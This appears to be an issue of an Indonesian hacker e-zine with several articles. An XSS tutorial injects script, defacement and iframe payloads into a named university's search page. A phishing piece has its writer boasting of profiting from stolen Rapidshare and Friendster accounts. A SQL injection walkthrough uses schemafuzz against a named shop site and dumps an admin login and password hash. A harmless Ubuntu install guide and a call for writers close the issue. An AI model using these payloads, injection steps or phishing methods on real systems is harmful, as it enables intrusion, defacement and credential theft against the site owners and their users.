kelemahan XSS,saya tambahkan <script>alert('xss ditemukan')</script> <<< Ini adalah salah satu

script untuk melihat apakah suatu site mempunyai kelemahan XSS atau tidak.

Kembali ke contoh yang di atas,setelah saya memasukkan script tadi,maka akan muncul popup baru

yang berisi xss ditemukan.Nah,dari sini kita mengetahui bahwa site tersebut mempunyai kelemahan

XSS (keluarnya popup tadi).Selanjutnya kita bisa mengexploitasi site tersebut.

Saya coba ini :



http://www.petra.ac.id/search/index.php?q=<h1><marquee><font color=red>omicron9194 was

here</font></marquee></h1>

dan

http://www.petra.ac.id/search/index.php?q=<P ALIGN=center><IFRAME

SRC=http://protection.6te.net width=”777”

height=”1500”></IFRAME></P><h1><marquee>|omicron9194 was here|</marquee></h1>



Karena Script HTML yang tadi kita tulis dapat berjalan maka hal ini lah yang disebut dengan XSS. Lalu

apa hanya script HTML saja yang dapat di jalankan? Script yang bisa digunakan untuk XSS adalah

HTML,JavaScript,VBScript,ActiveX,Flash. Kita tadi menggunakan dua script,JavaScript dan HTML.

Dalam XSS ini,ada dua kemungkinan yang pasti,yaitu :

Pertama, script yang kita tambahkan,berjalan di browser kita <<<< Kita berhasil melakukan XSS , jika

kita sudah berhasil menampilkan tulisan,maka terserah temen-temen mau diapakan site tersebut

selama codenya masih bisa utk XSS :p.

Banyak sekali metode XSS yang dapat dilakukan,semua tergantung pada kreativitas masing-

masing.Ternyata,XSS cukup bahaya,mengapa? Melalui XSS,kita bisa mencuri password >>>

document.cookie

Kedua,script yang kita tambahkan tadi,tidak ditampilkan di browser <<<< gagal

Kenapa bisa gagal ?

Yang membuat kita gagal adalah karena situs tersebut sudah di filter, dengan kata lain server tersebut

udah di setting agar tidak melayani permintaan yang mendukung beberapa karakter seperti berikut :

Char ; / ? : @ = & “ #

Code %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23

Char { } | \ ^ ~ [ ] ` % ‘

Code %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27

XSS merupakan pilihan yang menarik bagi newbie yang tidak mempunyai shell ato sploit,karena untuk

melakukan XSS hanya membutuhkan browser!

XSS juga dikatakan oleh temen-temen saya sebagai "just for fun" , why ? Karena untuk melakukan XSS

ini, hanya membutuhkan pengetahuan dasar about HTML. Jadi setiap orang dapat dengan mudah

melakukan XSS ini :D

Mungkin hanya ini saja yang bisa saya jelaskan,semoga artikel ini bermanfaat.

Wassalamualaikum... ☺

Nick : omicron9194

Email : [email protected] atau [email protected]

Website : www.d1gdo.com



Phising Attack Pengenalan dan Pencegahannya

Writer : Metropolix ([email protected])

Berasal dari kata “Fishing” yang artinya memancing,sering kali kerap di

gunakan para cracker untuk memperoleh informasi pribadi seperti User

ID, Password,PIN, nomor rekening bank, nomor kartu kredit Anda secara

tidak sah.Dan biasanya data-data tersebut mereka lakukan buat

kepentingan pribadi mereka,tidak banyak juga yg merugikan korban-

korbannya.mereka yg melakukan aksi tersebut biasanya kerap di panggil

dengan sebutan “Phiser”!!! B-)

• Apa saja sih kemampuan yg umum di miliki para phiser ini ?

Sebenarnya tidak di butuhkan keahlian khusus untuk melakukan tehnik phising,atau kemampuan yg

besar untuk menjebol suatu system keamanan computer.phising banyak di lakukan dengan social

engineering, yaitu dengan memanfaatkan kelemahan orang saat mengintepretasikan sebuah

informasi di komputer.

• Bagaimana mereka melakukan tehnik Phising tersebut ?

Contoh phising yg kerap digunakan adalah dengan menggunakan halaman login palsu suatu

website,sehingga para member website tersebut dengan mudah terkecoh dan memasukkan

username dan password account mereka ke dalam form login palsu tersebut,yg tidak lain adalah situs

palsu yg di buat seolah menyerupai aslinya!.Akan tetapi biasanya kelemahan tehnik yg satu ini adalah

dengan dimana kita melihat keanehan pada URL atau LINK website tersebut.

Kita lihat contoh gambar berikut ini :



Yup!! Itu adalah contoh phising pada halaman login yahoo.Bisa kita perhatikan perbedaan URL palsu

dan yg asli.He..he…he!

Contoh lain lagi pada Rapidshare:



Sudah Jelas bukan,apa keuntungan yg bisa kita ambil dari kerugian orang lain ?! Xixixixixi…..

Saya sendiri dalam melakukan phising terhadap Acc Rapidshare dalam sebulannya bisa menghasilkan

uang sekitar 2 jutaan.

• Seberapa bahayakah phising ini ?

Bisa kamu bayangkan jika yg kita dapatkan adalah sejumblah data informasi kartu credit,no Pin,data

private member,Data penjualan (termasuk gak yah ?? ..wakakaka ),apapun itu.yg jelas phising ini bisa

menimbulakan efek negatife ke korbannya!

Kita lihat saja Belakangan ini phising yg marak terjadi pada situs yg lagi nge trend di kalangan “netters

muda” (lagak gw.. udah kayak paling tua ajah,,Jiakakaka..).Phising pada situs “ FRIENDSTER ”.

Testing saya dalam phising terhadap Friendster ini dalam satu harinya bisa menghasilkan sekitar 40

acc member!! O__O (tapi gak ada yg gw obrak-abrik loh… Cuma sekedar pengen tahu ajah…Xixixixi! )

Ok semuanya ..itu tadi sedikit info mengenai phising dari gw.

Mohon maaf apabila ada kekurangan atau salah kata dalam menuliskan artikel ini.saya sendiri masih

sangat newbie dan membutuhkan bimbingan dari semuanya.. ☺ Just Share And Learn !!!



Bedah Web With Schemafuzz SQL Injection Dengan Metode Schemafuzz

Writer : omicron9194 ([email protected])

Bahan-bahan yg harus disiapkan :

1. Python , donlot di http://www.python.org/ftp/python/2.5/python-2.5.msi

2. Schemafuzz >>> http://darkc0de.com/others/schemafuzz.py

3. CMD

Gunakan CMD , masuk ke folder schemafuzz.py

Dengan perintah >> schemafuzz.py -u "target" --perintah

Utk lebih jelasnya,,langsung ke TKP ,, xixixixixi

1.Cari target ,, ini target kita >>>

http://www.sleeppost.com/viewproduct.php?pid=923

2.Cek columnnya

schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" –findcol

maka akan keluar :



===================================================================================

+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--

+] Evasion Used: "+" "--"

+] 09:44:10

-] Proxy Not Given

+] Attempting To find the number of columns...

+] Testing: 0,1,2,3,4,5,6,

+] Column Length is: 7

+] Found null column at column #: 0

+] SQLi URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SEL

CT+0,1,2,3,4,5,6--

+] darkc0de URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION

SELECT+darkc0de,1,2,3,4,5,6

-] Done!

===================================================================================

Nah kita gunakan ini http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+

SELECT+darkc0de,1,2,3,4,5,6 utk nginject.

3.Cari db nya

schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+

SELECT+darkc0de,1,2,3,4,5,6" --dbs



===================================================================================

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d

arkc0de,1,2,3,4,5,6--

[+] Evasion Used: "+" "--"

[+] 09:56:47

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: sleeppo_store

User: [email protected]

Version: 5.0.67-log

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] ??sleeppo_store?

[-] 09:57:00

[-] Total URL Requests 3

[-] Done

===================================================================================

Tuh kan keliatan db nya,, wkwkwkkwk sleeppo_store

4. Cari nama tabel dalam db


SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store

Ni yg lengkapnya :



===================================================================================


arkc0de,1,2,3,4,5,6--


[+] 10:02:56

[-] Proxy Not Given




Version: 5.0.67-log

[+] Showing Tables & Columns from database "sleeppo_store"

[+] Number of Tables: 20

[Database]: sleeppo_store

[Table: Columns]

[0]advertisement: id,image,url

[1]brands: name

[2]category: cid,parent,name

[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi

n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead

er,orderwebfooter,sms

[4]emailgroup: gid,name

[5]emailgroupmember: gid,email

[6]emails: email,name

[7]faqreply: fid,faqquestion,faqanswer,fdate

[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact

[9]news: nid,title,detail,ndate,link_cid,link_pid,active

[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type

[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai

l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate

,deliverytime,paymentmode,remarks2

[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel

[13]product: pid,cid,brand,name,pno,detail,recommend

[14]productrel: pid,vtype,variance

[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour

[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating

[17]promotions: promotion_id,title,detail,startdate,enddate

[18]users: uid,name,email,contact,address

[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,survey,qty

[-] 10:24:51


[-] Done

===================================================================================



Berarti itu site punya 20 tabel,kolomnya juga ada tuh.Tinggal pilih yg mana yg mau di exploit :p

5. Exploit tabel n kolom

===================================================================================


SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword

===================================================================================

===================================================================================


arkc0de,1,2,3,4,5,6--


[+] 10:36:59

[-] Proxy Not Given






Version: 5.0.67-log

[+] Dumping data from database "sleeppo_store" Table "config"

[+] and Column(s) ['adminlogin', 'adminpassword']

[+] Number of Rows: 3

[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn: : ' onmouseover="inPr

oduct(:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn: )

" onmouseout='outProduct(:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5

c:NoDataInColumn: )'><td width='30%' style='padding:6px' ><a href='./viewproduct

.php?pid=:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn

: '><img src='./images/smalllogo.gif' border='1' style='border-color:#cccccc;z-i

ndex:1'></a></td>

<td width='80%' style='padding-left:20px;padding:6px'><b><a href='./viewproduct.

php?pid=:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:

&pv='>3</a></b>

<br><br>5<br /><br /><div style='float:right;background:url(./images/pricetag.gi

f) no-repeat;width:100px;height:42px;margin-top:5px;cursor:pointer' onclick='pri

ceClick(:NoDataInColumn:liphong:16a8c2870e2d639a58e46bfd58ff9c5c:

[1] No data

[2] No data

[3] No data

[-] 10:37:36


[-] Done

===================================================================================

Liat tulisan yg saya tebalkan ,,xixixi...itu user ama passnya udah kliatan,,passnya tgl di decrypt aja ;)

Cara diatas berlaku untuk sql versi 5 , utk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n

kolom

ex:

===================================================================================


SELECT+darkc0de,1,2,3,4,5,6" --fuzz

===================================================================================



Beberapa perintah :

--fuzz >>> mencari nama kolom n tabel pada sql v 4

--schema >>> melihat nama tabel

--dump >>> melihat isi kolom

--findcol >>> menemukan dakc0de ( colom )

Silahkan cari yg laen. Baca aja help nya :p

Semoga bermaanfaat :)



Instalasi Ubuntu 8.10 (Intrepid Ibex) Migrasi dari Windows ke Linux

Writer : Equal ([email protected])

#first

Linux Untuk Umat Manusia

"Ubuntu" berasal dari bahasa kuno Afrika, yang berarti "rasa perikemanusian terhadap sesama

manusia". Ubuntu juga bisa berarti "aku adalah aku karena keberadaan kita semua". Tujuan dari

distribusi Linux Ubuntu adalah membawa semangat yang terkandung di dalam Ubuntu ke dalam

dunia perangkat lunak.

Diatas merupakan sedikit synopsis dari OS ini, yah, kita berharap (tidak hanya berharap,tapi juga

bertindak) semoga Linux ini dapat mencapai misi yang telah ditetapkan. Dan alasan saya membahas

tentang OS ini adalah karena saya mengambil Mata Kuliah Sistem Operasi dan pada mata kuliah ini

akan mempunyai Tugas Praktek yang mengharuskan kami menggunakan Linux sebagai sarana

pembelajaran.

Ubuntu versi ini saya download dari http://www.ubuntu-id.org/ubuntu/download, bagi para pembaca

yang mempunyai bandwith yang sangat lebar dapat langsung mendownload pada link mirror yang

telah disediakan. Sedangkan bagi anda yang tidak dapat mendownload langsung Ubuntu mempunyai

Program pengiriman CD gratis yang dapat anda lihat syarat – syaratnya di sini http://www.ubuntu-

id.org/ubuntu/shipit .

#keterangan hardware

1. Monitor 17”

2. 1 buah PC dengan spesifikasi

3. Prosesor Intel Dual Core 1,66 GHz

4. HDD 160 GB

5. VGA 128 MB

6. RAM 1024 MB

7. DVD-RAM

#keterangan software

Untuk memasang Ubuntu ini pada computer saya menggunakan Virtual Machine yang berjalan diatas

OS Windows XP Profesional Service Pack 3 (fully updated) yaitu Sun xVM Virtual Box yang bisa anda

download di http://www.virtualbox.org/wiki/Downloads.



Mungkin ada pertanyaan kenapa menggunakan Virtual Machine tidak langsung diinstal saja pada PC

tersebut?

Pertama alasan saya menggunakan ini adalah :

1. Lebih mempermudah dalam pengetesan OS (bug,crash,error,dll)

2. Lebih hemat dalam penggunaan hardware

3. Tidak mengganggu Host OS jadi Linux hanya bertindak sebagai Guest OS (tidak berhubungan

sama sekali dengan OS yang digunakan yaitu Windows XP SP3.

#instalasi

Dalam penginstalan Ubuntu ini hanya mempunyai beberapa step/ langkah – langkah yang harus

dilakukan, dan saya jamin langkah - langkah itu tidak lebih dari 15 langkah. ☺

1. Masukkan Live CD Ubuntu 8.10 anda kedalam drive cd-rom, sebelumnya anda harus merubah

boot order agar computer anda memboot melalui cd-rom.

2. Akan keluar tampilan awal dibagian ini anda diminta memilih bahas yang akan digunakan,

disini saya memilih bahasa default yaitu English.

3. Kemudian akan keluar beberapa pilihan,saya akan memilih pilihan a.

a. Try Ubuntu without change to your computer

b. Instal Ubuntu

Tunggu sampai loading selesai, setelah selesai anda akan sampai di halaman desktop ubuntu

4. Dihalaman awal ini ada icon yang bertuliskan install, klik 2x pada icon tersebut.

5. Sampai keluar windownya akan ada 7 step yang harus dilewati untuk menginstal ubuntu ini

pada computer anda.

a. Pada step ini anda diminta bahasa yang ingin anda gunakan pada ubuntu anda, pada

step ini saya memilih bahasa inggris. Setelah bahasa yang diinginkan terpilih, klik

forward (Alt + F).

b. Di step ini anda diminta memilih region/wilayah tempat tinggal anda, pada step ini

saya memilih Jakarta – Indonesia, kemudian klik forward.

c. Di step ke-3 ini anda akan diminta memilih layout/tampilan dari keyboard anda, disini

saya sarankan menggunakan layout dari USA yang sudah merupakan standard yang

digunakan pada hampir semua keyboard yang ada di Indonesia. Setelah selesai memilih

klik forward kembali.

d. Pada window ini anda diminta untuk memilih bagaimana pembagian hdd anda untuk

tempat penginstalan ubuntu ini. Pada step ini ada 2 pilhan yang bisa dipilih, yaitu :



• Guided – use entire disk

Pada opsi ini anda akan dituntun seluruhnya dalam pembagian hdd anda.

• Manual

Dan pada opsi ini anda secara manual dalam pembagian hdd anda. (hanya

disarankan bagi anda yang sudah cukup mengerti seluk beluk linux). Karena

apabila salah dalam mengatur pembagian hdd anda dapat mengakibatkan

kehilangan data penting yang berada pada hdd anda.

e. Disini saya asumsikan anda memilih opsi Guided – use entire disk – klik forward.

Setelah memilih anda akan langsung dihadapkan pada beberapa kotak yang wajib anda

isi, yaitu :

• What is your name?

Kotak ini meminta anda memasukkan nama yang ingin anda gunakan sebagai

identitas didalam computer nanti. Disini saya menggunakan nama Equal.

• What name do you want to use to log in?

Kotak ini meminta anda memasukkan nama yang akan digunakan untuk

username anda nantinya, untuk log in. disini saya juga menggunakan nama

Equal (dalam huruf kecil)

• Choose a password to keep your account safe

Anda diminta memasukkan password yang akan digunakan untuk username

yang telah anda pilih (anda wajib memasukkan password). Pada kotak in anda

wajib memasukkan 2x password yang anda pilih, untuk memastikan anda

mengingat dengan baik password yang anda masukkan. Pada bagian ini saya

menggunakan password equalisme

• What the name of this computer

Disini anda diminta memasukkan nama dari computer yang akan anda gunakan.

Saya menggunakan nama vbox.

Terakhir pada step ini ada sebuah check box (Log in automatically) yang apabila anda

men-check checkbox ini maka ubuntu akan mengingat username dan password anda

(yang sangat tidak saya sarankan, berkaitan dengan hal security).

f. Ini merupakan step terakhir dari penginstalan ubuntu 8.10 pada computer anda, pada

step ini anda wajib memeriksa kembali semua pilihan anda dengan membaca laporan

dari semua setting-an yang telah anda pilih. Setelah semua sesuai dengan yang anda

inginkan maka tekan pilihan Install. Silahkan ditunggu sampai proses dari penginstalan

ini selesai.



g. Setelah selesai maka akan muncul sebuah window yang menginformasikan bahwa

instalasi ubuntu ini telah selesai. Dan pada jendela ini aka nada 2 pilihan yaitu tetap

melanjutkan menggunakan live cd (continue using live cd) atau me-restart computer

anda agar dapat langsung menggunakan ubuntu yang telah di instal tadi (restart now).

Disini saya memilih agar ubuntu langsung merestart dirinya, klik Restart now.

#last

Demikian tutorial saya tentang cara menginstal ubuntu 8.10 ini, masih banyak hal – hal teknik yang

belum dibahas dalam tutorial ini. Dan apabila ada kesalahan di dalam tutorial ini (dan saya yakin pasti

ada) mohon mengirimkan kritik dan saran ke [email protected]. Terakhir saya ucapkan

terimakasih karena anda telah berkenan membaca tutorial dari saya ini. Salam Equal

#shout & greets

• Teman – teman di Himpunan Mahasiswa Teknik Perangkat Lunak (HMPL)

• TPL Angkatan 2008 terutama Boedas Team.

• [saran & kritik] email me at : [email protected] atau ke web Equal

• [about me] mahasiswa disebuah perguruan tinggi, moderator di forum.hackers-center.org,

administrator di forum.sman2palangkaraya.com, dan manusia biasa yang pasti mempunyai

banyak kelemahan serta kekurangan ☺.



HC eMagazine Writer Ketentuan Menjadi Penulis HC eMagazine

Berminat menjadi penulis di HC eMagazine edisi berikutnya? Apabila anda berminat

jangan ragu-ragu untuk mengirimkan artikel anda ke redaksi HC eMagazine. Artikel

harus asli tulisan anda, kalaupun itu bukan buatan anda harus mencantumkan sumber

asli anda mendapatkan artikel tersebut. silahkan kirim artikel anda dengan ketentuan

sebagai berikut :

Materi yang ditentukan :

• Kategori Komputer & Internet

• Kategori Pemograman / Coding

• Kategori Hacking & Cracking

• Kategori Phising & Phreaking

• Kategori Handphone

Kirimkan tulisan anda dengan format :

• Format File : .doc

• Page Setup : Paper size = Letter atau A4

• Line spacing : single

• Font : Arial atau Calibri, size 12

Kirimkan tulisan ke Redaksi HC eMagazine :

1. [email protected]




Subject : HC eMagazine <judul tutorial>

Attachment : JudulTutorAnda.zip atau JudulTutorAnda.rar (pilih salah satu saja).

Tidak menerima file download di ziddu, rapidshare, 4shared, dll. (jika ukurannya besar di perbolehkan

disimpan di hosting seperti ripway, fileAve, Geocities, dll)

Artikel akan diseleksi. Jika sesuai dengan kriteria, maka akan kami publish di HC eMagazine edisi

berikutnya. Redaksi HC berhak mengedit isi tulisan sesuai kebutuhan.

Terima kasih.

Redaksi HC eMagazine



Lampiran : Serba – Serbi HC eMagazine

Logo-Logo Hackers-Center

Hacker eMagazine Vol.1_2

Documents

Transcript of Hacker eMagazine Vol.1_2